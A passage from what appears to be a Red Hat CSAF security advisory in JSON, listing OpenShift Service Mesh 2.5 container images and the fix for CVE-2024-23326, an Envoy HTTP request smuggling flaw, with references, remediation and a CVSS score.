"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-23326",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2024-01-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259228"
}
],
"notes": [
{
"category": "description",
"text": "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-23326"
},
{
"category": "external",
"summary": "RHBZ#2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-23326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23326"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
